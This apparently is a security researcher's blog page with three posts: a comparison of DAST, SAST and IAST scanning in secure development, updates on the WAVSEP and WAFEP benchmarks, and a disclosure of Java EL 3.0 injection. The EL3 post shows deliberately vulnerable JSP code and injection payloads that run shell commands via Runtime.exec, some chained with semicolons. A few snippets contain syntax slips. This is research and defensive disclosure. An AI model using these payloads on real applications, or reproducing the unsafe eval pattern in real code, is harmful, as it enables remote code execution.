Monday, May 1, 2017

DAST vs. SAST vs. IAST - Modern SSLDC Guide - Part I


Disclaimer
This article uses a relative ratio for the various charts, rather than an accurate one, to emphasize the ups and downs of various technologies to the reader. It also reflects the current situation to date (which may change as technologies mature), and relies on generalization’s and estimations on capabilities of technologies, and so, must be read in the proper context.

With the upcoming publication of the WAVSEP 2017 benchmark close at hand, I wanted to take the opportunity to provide my take on the role of DAST tools in the context of the various technologies and trends that have recently become dominant and prominent in the field.

Where do they fit in? What do they excel in compared to alternatives? When is the right time to use them?

Using a variaty of vulnerability detection soltuions have become widespread in software development projects, with the key of detecting crucial vulnerabilities as early as possible.

With the introduction and maturity of new vulnerability-detection technologies (IAST/DAST/SAST/HYBRID/OSS), and the expected streamline of (understandably) conflicting vendor claims, users may find it hard to discern which technologies may fit their needs, how to PRIORITISE their acquisition/integration, and when’s the right time to engage each solution category.

In the following article, I will be covering a few of the key aspects in the integration of these toolsets into an SSDLC (secure software development life cycle) environment – the OVERALL EFFORT and the IDEAL TIMING of each solution category, and the benefit of SUPPORTED TECHNOLOGIES and CODE COVERAGE they provide under different cirucmstances.

In addition to being exposed to a wide variaty of tools-of-the-trade, the article can also help the reader answer some basic questions when evaluating any one of these tools.

For those of us who somehow managed to escape the terms currently in use – this article covers the following technologies:

1) DAST – Dynamic Application Security Testing – Generic and Known Web Application Vulnerability Scanners that analyze a live application instance for security vulnerabilities. To further clarify – this is the category of tools that was covered in all the previous WAVSEP benchmarks.

  • This article specifically focuses on DAST solutions which are actively maintained and/or SSDLC adapted, with the ability to verify potential vulnerabiliteis through some sort of Exploitation/Verification process (referred to as EV for the purposes of the article), either external or in built into the detection algorithm, as opposed to "fuzzer" like tools based primarly on algorithms that rely on identifying specific keywords in the response.

2) SAST – Static Application Security Testing – Generic & Known Application Vulnerability Code-Level Scanners that analyze source code and application configuration files for security vulnerabilities.

3) IAST – Interactive Application Security Testing – Generic and Known Application Vulnerability Debug/Memory Level Analysis Solutions that attempt to identify vulnerabilities on live application instances while also analyzing code structures in the memory and tracking the input flow throughout the application sections. This category is further divided into the following subcategories:
  • Passive IAST – IAST solutions that rely on traffic already being generated to identify potentially vulnerable sections, WITHOUT performing additional attack/exploit verifications (e.g. sending input with all the necessary exploitation characters, etc).
  • Active IAST – IAST solutions that verify potential vulnerability sinks/sources through the use of requests that verify the actual exploitability of the potential vulnerability (again, by issuing requests that contain input with all the necessary exploitation characters, or through similar means).


4) OSS - Open Source Security – the SAST equivalent of the mythological CGI-scanner – these solutions that were, for the purposes of this article, integrated into the category of SAST, due to similarity of the chart positioning and role, although these solutions operate in an entirely different manner, and focus only on the identification of “known” vulnerabilities in 3rd party libraries. 


*) The various asepcts of hybrid analysis tools are NOT covered in the various article sections and charts, and the same goes for network vulnerability scanners with application level features but without SSDLC adaptation, or cloud security solutions without SSDLC integrations.

So Which Solution Category Is Most Important in SSDLC?


Technology Support vs. Code/Application Coverage

The most obvious differentiation between the various scanning solution categories is the amount of supported technologies. 
IAST solutions typically support only a handful of development technologies, SAST solutions can support a myrid of modern and legacy programming languages, and DAST solutions are rarely affected by the development technology -

Click to Enlarge


#
Supported Technologies
DAST
Any application with WEB/REST/WebService back-end.
Some exotic back-end listeners may be supported as well (web-sockets, DWR, AMF, etc).
The support also depends on compatibility with input delivery vectors, as well as compatible crawling OR session recording features.     
SAST
Java, ASP.Net, C#.Net, VB.Net, PHP, Noje.js, Html/JS, SQL, Ruby, Pyhon, C, C++, JSP, ASP3, VB6,  VBScript, Groovy, Scala, Perl, Apex, VisualForce, Android/iOS/WinMobile, Objective C, Swift, PhoneGap, Flex ActionScript, COBOL, ABAP, Coldfusion CFML
IAST
Java, .Net, PHP (few vendors), Node.js (few vendors), Ruby (few vendors), Python (experimental)

The charts and tables signify the result of high end DAST/SAST/IAST in the industry, and obviously, some SAST and IAST solutions may support a much lower subset of technologies than the listed scope. Comparing the support for scanning non-web application variants (custom non-HTTP-based protocols) will drastically affect the chart as well.

It is also important to mention that DAST/Active IAST solutions in automated modes also need to be able to "crawl" the technology, or at the very least support the creation of recorded "sessions" of a manual crawling process, and also support sending attack payloads through the "input delivery vectors" used by the application (e.g. query-string / body / JSON/ XML / AMF / etc).

Although SAST / Passive IAST solutions also need to support "tracking" the input delivery vectors, they could, theoretically, identify hazardous code patterns without tracking the entire input-output flow, with the price of potential false positives being reported.

The difference in technology support in IAST solutions partially related to the fact that IAST implementations are relatively new compared to DAST or SAST implementations, but also to the amount of effort required to "integrate" the IAST engine to each new technology, and furthermore, to maintain the implementation with the release of newer versions of the same supported technologies (adaptations may be required for major java JVM versions, newer .net framework versions, etc).

So, although this technology-support "GAP" may be smaller over time, the effort that will be required to maintain technology support will grow at a bigger pace, at least when compared to the pace of DAST and SAST technology compliance.

It is however, worth mentioning that most IAST vendors focus on widely used technologies that would cover as much ground as possible (Java / .Net / PHP / Node.js), and thus the actual importance of this "gap" will greatly vary for some organizations, and may even be insignificant for some.

And what of coverage ?

As it appears, being able to "support" a technology, does not necessarily allow the testing tool to automatically cover the larger portion of it's scope, which in turn, may dramatically affect the results. 

The type of technologies evaluated, the method of evaluation, the code deployment format, and even the "legal" ownership of the source code libraries may affect the actual sections being covered by the tool.

The coverage criteria will be easier to understand in the form of a table, rather than a chart:

Coverage
DAST
SAST
Passive-IAST
Active-IAST
Out-Of-The-Box
Wide Coverage Min Effort
?
In Unauthenticated/ Form/Basic/NTLM
ü
Most Scenarios
?
In Tested/Used Instances
û
Depending on Implementation
End-To-End Coverage
Scan/Correlate Issues in All Client/FE/BE Layers
ü
In Client Triggered Sequences
û
Depending on Implementation
û
Depending on Implementation
?
Depending on Implementation
3rd Party Code
Closed Source Libraries/Entry-Points
?
For “Visible” Methods
û
No DE-compilation
ü
Depending on Implementation
ü
Depending on Implementation
Dead/Blocked Code
Non-Web Executable
û
Depending on Implementation
ü
Most Scenarios
û
Depending on Implementation
û
Depending on Implementation

Conclusion:
DAST and SAST tools *typically* support more technologies, and as far as coverage is concerned -
  • DAST excels in end-to-end coverage AND "visible" 3rd-party coverage, but may require manual configuration for each application, or at the very least, an effective crawling mechanism that supports the front-end GUI technology.
  • SAST excels in out-of-the-box coverage, but lacks in 3rd party software coverage (assuming it does not perform de-compilation of 3rd-party libraries), and may requires manual syncing to "identify" associated end-to-end layers. That being said, early in development, it's probably the most likely method of getting early feedback on potential vulnerabilities.
  • IAST will typically be positioned somewhere between the two in the various coverage categories - it will require agent distribution to support end-to-end detection (if it is supported at all), but will require less effort to achieve a wide coverage of application entry points (particularly in the case of Passive-IAST), and might have the advantage of potentially providing an in-depth coverage for CLOSED 3rd-party code/libraries.

Integration Effort vs. False Positives Effort

Throughout the development process, in both the early and later stages, the amount of effort invested in detecting these vulnerabilities can, knowingly or now, play a key role in the success of the detection process.

For every vulnerability detection solution and for every scenario, resources are required to integrate the chosen solutions, maintain the integration (not as easy as it sounds), and go over the results to filter high-impact and relevant issues.

Since for all the phases there’s a limited amount of human and IT resources, overly complex integrations can DELAY (or sometimes even PREVENT) the detection of security issues to a point that the benefit of detecting them early won’t apply, while complex and tedious result analysis processes can easily cause the developers to ignore identified critical issues due the sheer number of irrelevant results.

The overall effort of using each tool, is not always properly estimated by potential consumers, and for various tool categories, is focused on different areas.

Although the most obvious effort seems to be the initial integration of the vulnerability scanning process (for live instances, code, or combination thereof), the process of verifying which of the results is REAL and EXPLOITABLE, to justify mitigation effort, may be just as tiditious and even more time consuming.

To put the upcoming results into proper perspective, it's crucial to understand that the relative ratio presented in the various charts is exactly that - relative, and that in fact - most modern solutions are FAR BETTER in terms of accuracy then previous generations of tools (early DAST / early SAST / fuzzers / parsers). To further emphasize the perspective, assume the accuracy of modern tools falls in the following context when compared to that of previous generetion tools:



And now, when the relative scale has been clarified, we can begin to compare modern technologies against each other.

To simplify the analysis, we will evaluate effort required to integrate, maintain, and analyze the results (False Positives vs. True Positives) of various vulnerability detection tool categories, in relation to each other:


Click to Enlarge

From the point of view of integration, some tools are easier to integrate than others, some have very little  or no effort required for maintanance, and some require a specific scan policy in order to maximize the result efficiency.

The justification for the chart diveristy of the various categories is as follows:
  • In an environment without any live application instances, SAST solutions can still be used to scan source code repositories, either directly or through the upload of source code projects, simplyfing the initial assessment process 
  • In an environment with live application instances, IAST solutions can be integrated simply by deploying an agent to the assessed application baseline framework. Although the initial integration may be difficult (dedicated servers, configuration, potential performance issues in shared environments, etc), once the solution is set up there's very little maintainance .
  • In an environemnt with live application instances, DAST solutions can be easily used to scan unauthenticated applications and will require minor configuration to scan applications with FORMS/HTTP authentication. More complex authentication methods, scan barriers (e.g. anti-CSRF mechanisms) or architectures (micro-service architecture, REST, WS, etc) may require the creation of a dedicated policy and/or manual crawling session recording, Active IAST solutions will require most of those prequisities, in addition to deloying agents to the various tested layers.


To complete the picture, we will now place the false positive effort aspect first - to present the *typical* ratio of false positives in the results provided by the various tool categories, and the corresponding effort required to identify actual issues throughout the analysis results:

Click to Enlarge



The relative ratio of false positives derives from the efficiency and number of methods that can be used by each technology to verify that identified vulnerabilities are not false positives:

Click to Enlarge



The justification for the chart diveristy of the various categories stems from the verification methods that can be used by each solution category:



DAST
SAST
Passive IAST
Active IAST
Execution URL
Client-Driven Exploitation
Entry-Point-To-Vuln-Code
ü
Exploit URL / Payload
û / ü
Framework Dependent
ü
Exploit URL
ü
Exploit URL and Payload
Execution CLI
Command Line Exploitation
CLI-Param-To-Vuln-Code
û
CLI Not Supported
ü
CLI Entry Point Detected
?
Theoretically Possible
?
Only via Passive
Flow/Taint Analysis
Track Sequence of Methods to Activate Vulnerable Code
?
Irrelevant for Technology
û / ü
Key-Word Dependent
ü
In Effect
ü
In Effect
Input Effect on Sink
Track Live Input Effect on the Vulnerable Code
?
Through Binary Methods
û
Not Performed
ü
Commonly Used
ü
Commonly Used
Modified Input Effect
Track Modified Input Effect on the Vulnerable Code
ü
Payload Effect Analysis
û
Not Performed
û
Not Performed
ü
Payload Effect Analysis
Execution POC
Time Delay, External Access, Browser Effect, Response Diff
ü
Commonly Used
û
Not Performed
û
Not Performed
ü
Commonly Used
Exploitation POC
Full Scale Exploitation: Data Extraction, RCE, Shell Upload
ü
In Some Solutions
û
Not Performed
û
Not Performed
ü
In Some Solutions


Additional importance is given to the information the various tools provide to a HUMAN trying to discern the relevance of the issues reported, and toolset (if any) provided to "reproduce" or manually "verify" the identified security issues.

Furthermore, the false positive factor will become EVER MORE IMPORTANT with the increase in volume of scanned applications. Weeding out false positive from actual issues will require time and effort from a security expert, and any mistintrepertations will cost even more for developers to mitigate.


There’s always the exception
A relative obsolete and unmaintained DAST vulnerability scanner, in which there is little or no effort to “verify” detected vulnerabilities will fare no better, and probably much worse, than a typical SAST/Passive-IAST solution, in terms of the ratio of false positive identification.
On the other hand, a relatively immature or unmaintained SAST/Passive-IAST solution will fare much worse than presented in the charts - even in the effort required for integration and maintenance, especially compared to a modern DAST implementation.


Part II Coming Soon...




Tuesday, September 15, 2015

WAVSEP Updates, FAQ and the 2015 Benchmark Roadmap


A couple of updates on the WAVSEP 2015 benchmark:

The 2015 benchmark is already ongoing, and I started testing scanners against a newer unpublished version of WAVSEP which will be published at the end of the benchmark.

I'll be focusing on the usual commercial and actively maintained open source contenders, but may include additional vulnerability scanner engines that match my criteria or join the comparison in one of the methods listed in SecToolMarket.

WAVSEP New Homepage

As of August 2015, WAVSEP has been official migrated to github, and the various installation instructions have been migrated to the relevant github wavsep wiki (installation / features).

The source code, builds and wiki will be maintained in github, but I'll be releasing builds to wavsep sourceforge repository as well.

Just to clarify - both repositories currently contain the latest public version of WAVSEP.

About the Upcoming Benchmark

The benchmark will cover all the previously covered aspects, as well as 2-3 additional attack vectors, and 2-3 new measurement concepts. Its the biggest one so far, but hopefully, I'll find smarter methods of assessing the products to speed up the process.

As mentioned before, to make the results useful earlier, I'll be publishing some of the results during the testing to SecToolMarket, and tweet when there's updates to the various engines, instead of waiting to the end of the benchmark.

Vulnerability Scanner Feature Mapping to RvR

The plan is to eventually associate the various features assessed in WAVSEP with a new project called RvR (relative vulnerability rating), currently hosted in the following address, aimed to define identical classifications of features for comparing security products.

The RvR list still includes 288 (!) attack vectors with videos, links, etc, but there's already 60+ additional attacks pending to be added, contributed by volunteers from around the globe.

Trying to Release an Initial WAFEP Benchmark

WAFEP (Web Application Firewall Evaluation Project), WAVSEP's evil WAF testing brother, is almost ready for initial release, with thousands of proven WAF bypass payloads ready.
However, I'm trying to release an initial benchmark with the framework, covering 2-5 WAF engines to make my point.

Its tricky to stuff these projects in the same timeframe, and WAVSEP is my current priority, but we'll see how it works - WAFEP is designed to take a lot less testing time.

In any event, I'll tweet about additional updates and whenever I update the results.

Cheers



Sunday, January 18, 2015

RvR, WAFEP and WAVSEP results update


Most of my time these days is spent on creating a dynamic interface for updating benchmark results, and on two major projects aimed at enhancing the WAVSEP evaluations and adding additional comparison content, in addition to accuracy, crawling and automation.


The first project, RvR (Relative Vulnerability Rating), is a project I already mentioned in the past which merges vulnerabilities from well known vulnerability classifications (WASC, CWE, CAPEC, OWASP, Blogs, Conferences, etc) into a list customized specifically for product feature evaluations.

The list, originally planned to include 233 attack vectors, already includes 284 (!!!) different attack vectors with unique classifications, links, repository mapping and videos,
A web site containing the content was published last week, and although all the content is very much usable, I'm still delaying the publication until I get some vendor feedback (expect an official publication soon).

The purpose of the project is not only to evaluate features of dynamic vulnerability scanners (DAST), but also to cover source code analysis tools (SAST), interactive application testing tools (IAST), and in contrast to the past - various software protection products, including application-level IDS/IPS mechanisms and web application firewalls (WAF).

Which leads me to the second project -

WAFEP - The Web Application Firewall Evaluation Project



WAFEP is an upcoming project aimed to serve a WAVSEP-like role for various application-level protection products.

Unlike WAVSEP, WAFEP is planned on being completely automated in terms of payload execution AND result calculation, and would enable the evaluation of web application firewalls in relatively short timeframes.

The "accuracy" aspect is implemented as attack vector specific payloads meant to simulate context-specific exploits that an IDS/IPS/WAF should identify and/or prevent, false positive scenarios that should not be identified, and in the future, evasion techniques that may circumvent the detection process.

The project already includes thousands of payloads imitating flavors of +-10 high-impact attack vectors, some of which were already published in an early alpha version uploaded to the project source forge repository last week.

The published alpha version is just a technology POC, and does not include most of the vector payloads or content, but in the upcoming weeks I'll make an effort to finish up some sections in the platform and release a v1.0 public version.
I'll also publish updated versions with relevant payloads in the meantime, at least until I reach the 1.0 goal.

http://sourceforge.net/projects/wafep/


WAVSEP Results Update

Finally, from time to time, I still try to squeeze in additional WAVSEP product assessments for additional vendors, the latest of which is Tinfoil Security, alongside certain version upgrades,

As always, the full list is found in SecToolMarket, and the following image summarizes the updates:



If all goes well, in the near future, the list will be updated with the results of a couple of more.

I didn't update the results of any of the open source products, and will try to find the time to do so in the near future, at least for some of the projects - a task that should be much easier once the dynamic interface is finally online.

Wednesday, December 17, 2014

EL 3.0/Lambda Injection: Hacker Friendly Java

The following article explains the mechanics of a code injection attack called EL3 Injection in applications that make use of the relatively new EL3 processor in java.

New mechanics and operators introduced in EL3 make the discovery and exploitation of this exposure almost as easy and seamless as SQL Injection, and the impact of the vulnerability is severe, with potential impacts such as denial of service, information theft and even remote code execution.

Since the EL3 technology is relatively new it's probably not (YET) as common as other severe exposures, but at the very least, it will put a big wide THEY DID WHAAAAT!? smile on your face.

[Note – 
The following article discusses a generic application-level coding flaw in modern Java applications, NOT a java 0-day.

Keep on reading – the juicier RCE payloads are presented at the end]

While trying to (and miserably failing at) create a training kit for EL Injection (or Spring EL Injection, JSR245, if you will), published by Stefano Di Paola and Arshan Dabirsiaghi, I spent some time trying to get a working build of the eclipse-based STS IDE version which supported the vulnerable Java Spring MVC versions (Spring 3.0.0-3.0.5).

Turns out that someone did a REALLY GOOD job eradicating every trace of the vulnerable builds, leaving only time consuming options of compiling the environment from scratch.

Luckily, at some point, I decided to take a short break, and read about the relatively new EL in Java (JSR341, not necessarily in Java Spring) – and found something VERY interesting.

Turns out that the newest java expression language version, EL 3.0 (published sometime in 2013), includes multiple enhancements, such as operators, security restrictions on class access, and so on.

A typical source code sample of using EL3 in a Servlet or JSP page would look something like:
<%@page import="javax.el.ELProcessor"%>
<%
ELProcessor elp = new ELProcessor();
Object msg = elp.eval("'Welcome' + user.name");
out.println(msg.toString());
%>

The ELProcessor dynamically evaluates the EL statement, and attempts to access the "name" fields of the Bean (or registered class) user.

After taking a couple of shots at "guessing" objects that might be accessible by default, I stumbled on one of the features that can be used to define access to classes in EL3, which includes the ELManager class methods importClass, importPackage and importStatic.

These methods could be used to "import" various classes and even packages into the scope of the expression language, so they could be referenced within expressions.

So in order to use classes in EL3 expressions, you'll need to include them using statements such as –
elp.getELManager().importClass("java.io.File");

This feature was implemented due to safety concerns (or in other words, security), to make sure that access to classes is presumably prevented for any class that was not also included in the page/project original EL imports AND application imports, so that even if developers will enable user input to affect the "importPackage" or "importClass" statements, the external effect will be limited to the classes already imported in the context.

However, since many interesting classes and packages are typically used in Servlets and JSP pages, an attacker can still abuse this feature in multiple scenarios –

(1) If the developer already imported a class that the attacker needs into the EL context, and an attacker controlled input is used within the expression evaluation:
Input1 = "File.listRoots()[0].getAbsolutePath()"
<%@page import="javax.el.ELProcessor"%>
<%@page import="javax.el.ELManager"%>
<%
String input1 = request.getParameter("input1");
ELProcessor elp = new ELProcessor();
elp.getELManager().importClass("java.io.File");
Object path = elp.eval(input1);
out.println(path);
%>

(2) If the developer enabled the user to control the importClass/Package statement (no limits to human stupidity, right?), and already has a wide enough scope imported in the page/application imports:
Input1 = "File.listRoots()[0].listFiles()[1].getAbsolutePath()"
Input2 = "java.io.File";
<%@page import="javax.el.ELProcessor"%>
<%@page import="javax.el.ELManager"%>
<%
String input1 = request.getParameter("input1");
String input2 = request.getParameter("input2");
ELProcessor elp = new ELProcessor();
elp.getELManager().importClass(Input2);
Object path = elp.eval(input1);
out.println(path);
%>







So, here you go.
A nice exploit that will probably affect a couple of desolate apps, with super insecure code. Hardly worth its own classification.
However, while trying to squeeze some more juice out of the potential attack vector, I stumbled upon the following video, which explains the features of EL3 in great details.

To make a long story short, watch the video and skip to 7:52.
It's well worth your time.

Turns out that despite the security restrictions that required developers to explicitly import classes and packages to be used in the EL3 scripts, the java.lang package was included by default, to enable the typical developer to gain access to static type object and methods such as Boolean.TRUE and Integer.numberOfTrailingZeros.

They enabled access by default to the static members of classes in JAVA.LANG, as in the java.lang package that includes java.lang.System and java.lang.Runtime!

JAVA.LANG!

Seems like somebody there confused "user friendly" with "hacker friendly" J

So, if for some reason, a user controlled input would stumble into an EL3 eval clause, which for some reason java is encouraging users to use in many platforms such as JSF, CDI, Avatar and many CMSs, than attackers could do a LOT more with no requirements on specific imports -
Input1 = "System.getProperties()"
<%@page import="javax.el.ELProcessor"%>
<%@page import="javax.el.ELManager"%>
<%
String input1 = request.getParameter("input1");
ELProcessor elp = new ELProcessor();
Object sys = elp.eval(input1);
out.println(sys);
%>



Also, Instead of using the System class, we can use the Runtime static class methods to execute shell commands. For example:
Input1 = "Runtime.getRuntime().exec('mkdir abcde').waitFor()"
<%@page import="javax.el.ELProcessor"%>
<%@page import="javax.el.ELManager"%>
<%
String input1 = request.getParameter("input1");
ELProcessor elp = new ELProcessor();
Object sys = elp.eval(input1);
out.println(sys);
%>


An impact similar to that of the Spring's counterpart of EL injection, only in mainstream Java.
Cool. Now we can shamelessly classify the attack and rest.

But there's more!

Although scenarios in which the user's input will get full control of the entire EL string are possible, they are much less common than scenarios in which user input might be integrated as a part of an EL string, in which case most of the previously mentioned payloads won't work.

However, EL 3.0 was kind enough to present us with NEW operators, one of which is the infamous semicolon (;).

As its SQL counterpart functionality suggests, the semicolon delimiter can be used in EL 3 to close one expression, and add additional expressions, with or without logical relations to each other.

Think adding multiple lines of code to a single attack payload. Think injecting payloads into the middle of expression, while using techniques similar to blind SQL injection.

Don't think. Here's a couple of examples:
Input1 = "; Runtime.getRuntime().exec('mkdir aaaaa12').waitFor()"
<%@page import="javax.el.ELProcessor"%>
<%@page import="javax.el.ELManager"%>
<%
String input1 = request.getParameter("input1");
ELProcessor elp = new ELProcessor();
Object sys = elp.eval(("'Welcome' + input1);
out.println(sys);
%>
 


Input1 = "1); Runtime.getRuntime().exec('mkdir jjjbc12').waitFor("
<%@page import="javax.el.ELProcessor"%>
<%@page import="javax.el.ELManager"%>
<%
String input1 = request.getParameter("input1");
ELProcessor elp = new ELProcessor();
Object sys = elp.eval(("SomeClass.StaticMethod( + input1 + ")");
out.println(sys);
%>

So due to the implementation of the semicolon operator, potential injections can now CLOSE PREVIOUS STATEMENTS and start new statements, making the potential injection almost as usable as SQL injection. Features such as EL variable declaration, value assignments and others (watch the video) just add more fuel to the fire.

So much for enhanced security features.

We already identified a few instances that affect real world applications (no instances in core products, so far), and are currently handling them infront of the relevant entities.

I'll probably invest some more time in the upcoming weeks to see if any prominent java projects are prone to this issue, but in the meantime, some practical notes:

Regardless of how common these issues are, these potential exposures could easily be identified in code reviews or by source code analysis tools that track the effect of input on the various methods of the ELProcessor class, and on similar EL related classes. 
Generic blind injection payloads can be added as plugins for automated scanners, and we could go bug hunting to see if any more of these potential issues exists in the wild.

The mitigation is also simple, not embedding input into EL statements and validating input in case you do.

I'll update this post as the research progresses.

Cheers